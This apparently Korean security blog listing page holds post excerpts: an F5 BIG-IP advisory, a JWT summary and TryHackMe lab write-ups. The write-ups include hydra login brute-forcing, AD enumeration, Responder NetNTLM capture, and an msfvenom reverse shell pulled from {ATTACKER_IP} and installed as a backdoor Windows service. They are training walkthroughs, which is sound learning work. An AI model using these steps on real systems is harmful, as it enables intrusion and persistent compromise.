f5 big-ip 보안 업데이트 권고 (10월)
·
일상X사랑X돈/보안이슈
CVE-2023-46747 (원격 코드 실행 취약점) https://my.f5.com/manage/s/article/K000137353 CVE-2023-46748 (SQL injection) https://my.f5.com/manage/s/article/K000137365 진단 시 참고
JWT, 왜 사용하는가? 요약
·
일상X사랑X돈/뜨거운감자
JWT - 장점 : Stateless로, 확장성을 가짐 - 단점 : 페이로드가 인코딩되어 있기에 중요 정보를 담을 수 없음. 토큰 탈취 시 대처가 어려움 ▶ 결론 : 확장성이 중요하다면. 기능 및 보안은 어느정도 타협하고 JWT를 사용할 것. *기능: 토큰의 즉시만료와 같은 기능을 의미한다. JWT는 Access Token을 즉시 만료시킬 수 없음. 무조건 만료시간이 지나야함. 의문 보통 Refresh Token은 서버에 저장한다고 한다. 그럼 JWT를 사용하는 이유가 뭐지? Stateless하기에 JWT를 사용하는데, 굳이 다시 중앙화를 시키는 이유를 모르겠다. 세션을 사용하면 되는게 아닌지? 해결 어쩔 수 없는 부분인 듯 하다. 리프레쉬 토큰을 JWT로 구현해서 클라이언트 측에 뿌리면 너무 취약해지니..
THM - Offensive Pentesting-Skynet
·
System/침투
https://tryhackme.com/room/skynet gobuster dir -u http://10.10.83.54/ -w /usr/share/wordlists/dirb/common.txt   hydra 10.10.83.54 -l milesdyson -P ./log1.txt http-post-form '/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect' -V smbclient //10.10.83.54/anonymous  10.10.83.54/squirrelmail milesdyson cyborg007haloterminator  smbclient //10.10.83.54/milesdyson -U mil..
THM - Enumerating Active Directory(2)
·
System/침투
TASK 6. Enumeration through BloodhoundTHM 링크  Bloodhound : AD 또는 Azure 환경 내 관계를 확인할 수 있음.  (GitHub)- 공격자 : 복잡한 공격 경로를 쉽게 식별할 수 있음 - 방어자 : 공격 경로를 식별하고 제거할 수 있음  Sharphound : Bloodhound의 열거 툴로, Bloodhound에서 시각적으로 표시할 수 있는 AD정보를 열거하는데 사용 - Sharphound.ps1 : Sharphound 실행을 위한 Powershell 스크립트 (업데이트 중단). 스크립트를 메모리에 직접 로드하여 디스크 상 AV 스캔을 피할 수 있으므로 RAT과 함께 사용 권고 - Sharphound.exe : Windows 실행 파일 - AzureHou..
THM - Enumerating Active Directory(1)
·
System/침투
Enumerating Active DirectoryTryHackMe 링크 CMDnet user /domain : AD 도메인의 모든 사용자 출력  net user  /domain  net group /domain : AD 도메인의 모든 그룹 출력  net group /domain net accounts /domain : AD 도메인의 패스워드 정책 출력  cmd을 사용한 AD 열거 장점 - 추가 도구가 필요하지 않으며, 이러한 간단한 명령어는 블루팀에서 모니터링하지 않는 경우가 많음  - 명령 실행을 위한 GUI 불필요 - 피싱 페이로드에 주로 사용되는 VBScript 및 기타 매크로 언어는 cmd 명령을 기본적으로 지원함. 구체적인 페이로드가 작성되기 전에 AD 도메인에 관한 정보 열거 가능  단점 ..
THM - Breaching Active Directory (2)
·
System/침투
Task 5  Authentication Relays Responder 다운로드 링크 Responder는 IPv6/IPv4 LLMNR/NBT-NS/mDNS 포이즈너(Poisoner)로, 이를 통해 NetNTLM Challenge를 가로챌 수 있다.로컬 네트워크 내  Challenge만 가능하며 현재 VPN을 통해 네트워크에 연결되어 있으므로 해당 VPN 네트워크에서 발생하는 인증 Challenge 타겟이된다. THM의 어택박스로 실습하니 왜인지 작동하지 않아서 VPN을 사용했다.  [KALI VM]openvpn breachingad.ovpn 1) TryHackMe에서 제공하는 네트워크 VPN서버로,이것을 실행해준다 (링크) 2) ifconfig 3) Responder 다운 후 실행responder -I ..
THM - Breaching Active Directory (1)
·
System/침투
랩실에서 실습하기 위한 사전 준비 [ATTACKBOX]systemd-resolve --interface breachad --set-dns {THMDC_IP} --set-domain za.tryhackme.comnslookup thmdc.za.tryhackme.com Task 4  LDAP Bind Credentials애플리케이션이 사용할 수 있는 AD인증방법 4.1 NTLM  - 시도-응답 기반 체계인 NetNTLM을 사용  - 애플리케이션이 사용자를 대신하여 인증, 애플리케이션 자체에서 직접 사용자를 인증하지 않음  - AD자격증명은 DC에만 저장 (애플리케이션에 저장X)  4.2 LDAP   - 애플리케이션이 사용자의 자격 증명을 직접 확인함  - 애플리케이션은 AD 자격증명 쌍을 가지고 있음    ..
THM - Windows Local Persistence (3)
·
System/침투
TASK 4. 서비스 남용 4.1 Creating backdoor services  1) 리버스쉘 페이로드 만들기 msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4448 -f exe-service -o rev-svc.exe* 포맷이 exe-service이다. 2) 가져오기  scp root@{ATTACKER_IP}:/root/rev-svc.exe c:\windows\3) nc 리스닝 4) 서비스 등록하기 sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= autosc.exe start THMservice2  4.2 Modifying existing services..